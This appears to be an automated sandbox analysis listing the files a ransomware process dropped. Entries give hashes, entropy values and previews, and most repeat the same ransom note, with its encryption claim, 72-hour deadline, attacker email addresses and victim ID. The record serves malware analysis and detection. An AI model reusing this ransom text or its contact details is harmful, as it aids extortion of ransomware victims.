                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):1265
                                                                                                    Entropy (8bit):7.856856774089695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Sixt1CC9ZwXy+TgF77fmddaqHowf+dHoudG6gg9T4xjp1/rCMOk:pCC/wiF774MqHd26zgKlBrOk
                                                                                                    MD5:3648C9C39F2186A378D08D22B102CF18
                                                                                                    SHA1:E846E9B34CB2ED534022D39B0ED7D93B93D958BD
                                                                                                    SHA-256:4E745910EC4814B60D7B1E1AFC165DD330D0989F41E00FBCC3E371AC61665A4C
                                                                                                    SHA-512:C3536796B3BC2CE1E4BA04972FADBF38EA2369EBFD8A640A6115FC0ED497EDD7B5F5228B20866A94FA4ED072E5395EEF9513CE4E9C3D58E0E4FA6E022C3E49DF
                                                                                                    Malicious:false
                                                                                                    Preview:..^..&q...n...M&.e..sTTc..jO......S..MB.A.YD`.....3.s.G.....)H.[.X.P.MRY.V..*............N..Z.n..f.R..].QHy.~.M\..xI..+35.W.^..&.-.....*.V..U.......<=...\1........Fr.Q.e+,?....]T..G....N...U. ....-m`^...|.F...PD+.b...@........%E.../{G...~..zg......ix#......"bD...O:*i85.<.:.......\,......x..R.....">.sa.J.+.@AK.d..x..6.W.8M3.'k.....~. 2... I.'MT..j.TPj..,.......I*.a..w.8Q..L}.....=f...q..v..dE...L..&x..5.hw......G.h.N$Y........+.{b..'.;...E<.K...e.d.............m.&.S..u."(g.T...H$...l.......J...r. ....}*^..5 [C#.Uy...is...P....7J.{..hK. /k...e....../d...-...s..C7X..l..M.&.*....E.;../..=^...e+....=.)@.;....;....,.I._....U1B3..:.....!.nT`q..D..H.;.....vFOV..|..`.@v. ....p.wM...C0...r..E?....S. .IB,B..x..s].b7..Z..>.....YD...BmQ{.K......n.cc...f.......).O..>(.../...1.......0w.8..o..R.....l.]C..$.,..I..v.\r..8..q...JhyX..aql.N..hi.En....U.[}.H&...z.~ ..Sj...Y...%...\.F...a..&.=>..1_.S....3..4....r.~R...F....F./..(.*+...Q.....:.Y[tion>...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1265
                                                                                                    Entropy (8bit):7.856856774089695
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Sixt1CC9ZwXy+TgF77fmddaqHowf+dHoudG6gg9T4xjp1/rCMOk:pCC/wiF774MqHd26zgKlBrOk
                                                                                                    MD5:3648C9C39F2186A378D08D22B102CF18
                                                                                                    SHA1:E846E9B34CB2ED534022D39B0ED7D93B93D958BD
                                                                                                    SHA-256:4E745910EC4814B60D7B1E1AFC165DD330D0989F41E00FBCC3E371AC61665A4C
                                                                                                    SHA-512:C3536796B3BC2CE1E4BA04972FADBF38EA2369EBFD8A640A6115FC0ED497EDD7B5F5228B20866A94FA4ED072E5395EEF9513CE4E9C3D58E0E4FA6E022C3E49DF
                                                                                                    Malicious:false
                                                                                                    Preview:..^..&q...n...M&.e..sTTc..jO......S..MB.A.YD`.....3.s.G.....)H.[.X.P.MRY.V..*............N..Z.n..f.R..].QHy.~.M\..xI..+35.W.^..&.-.....*.V..U.......<=...\1........Fr.Q.e+,?....]T..G....N...U. ....-m`^...|.F...PD+.b...@........%E.../{G...~..zg......ix#......"bD...O:*i85.<.:.......\,......x..R.....">.sa.J.+.@AK.d..x..6.W.8M3.'k.....~. 2... I.'MT..j.TPj..,.......I*.a..w.8Q..L}.....=f...q..v..dE...L..&x..5.hw......G.h.N$Y........+.{b..'.;...E<.K...e.d.............m.&.S..u."(g.T...H$...l.......J...r. ....}*^..5 [C#.Uy...is...P....7J.{..hK. /k...e....../d...-...s..C7X..l..M.&.*....E.;../..=^...e+....=.)@.;....;....,.I._....U1B3..:.....!.nT`q..D..H.;.....vFOV..|..`.@v. ....p.wM...C0...r..E?....S. .IB,B..x..s].b7..Z..>.....YD...BmQ{.K......n.cc...f.......).O..>(.../...1.......0w.8..o..R.....l.]C..$.,..I..v.\r..8..q...JhyX..aql.N..hi.En....U.[}.H&...z.~ ..Sj...Y...%...\.F...a..&.=>..1_.S....3..4....r.~R...F....F./..(.*+...Q.....:.Y[tion>...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.225659107027237
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:APq6YgHnziTxZQfJsNmtPBXwhu/dZqy9QuImSOSTHZSen:S8gTiTjQwWZwY1ZVquImpCZSen
                                                                                                    MD5:DF5A70CF732B54D0831C0F272DF20F6E
                                                                                                    SHA1:2FF33C92396F1037AE11FA91CC384040E88E7A94
                                                                                                    SHA-256:E2E75B4AB3624D24850E5577FB175645EBF4C022A177D9134B55FB7D10400477
                                                                                                    SHA-512:E7C123E546DDBF4B7DEE4D6237C118D01C45FB4330B0CA8132CD1D650B5FE8684428A2DD3BE39522D1C204D5E42CADCCD7AD830FC744C56DFC4853942941ECA9
                                                                                                    Malicious:false
                                                                                                    Preview:...I.f.C.z*.P..............^j9.@..Vn>.'!...KP..y..e..J...k...T..^>.5=..<R..R....s...ch..P...yo...J.+.@...V..f.(.J+?1Q.J....s...sC,9...Gv.!..JW.^.2j-.r.mY.....L..7...%..X...x...V..?..~.Y..gs....Y..r.g\....:.,d..1.v+6!..L\.........W@Psq|Y.MK9.{.vF?6b.....W..*....-.$:.....gu..0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1510207563435464
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulFllh:NllUF/
                                                                                                    MD5:8FC5F52E0D83D36163A2D88EFD76657A
                                                                                                    SHA1:850A6A65DD7530F45468179AE930049745A47B2A
                                                                                                    SHA-256:CBF0BD04B2ED240B978A7E7F32FB22E801985DD756F5B0BC5DD1E7DAB6B1FFFB
                                                                                                    SHA-512:2E056CB8D6BC33077EB44F22F5C2A7A31BF249244252DB7507297744B37EA9BAC680637F847CAA669DBB8F29BAA22A91435DB20B0A0A8DB875619431729205C7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e.................................K..............@..........
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
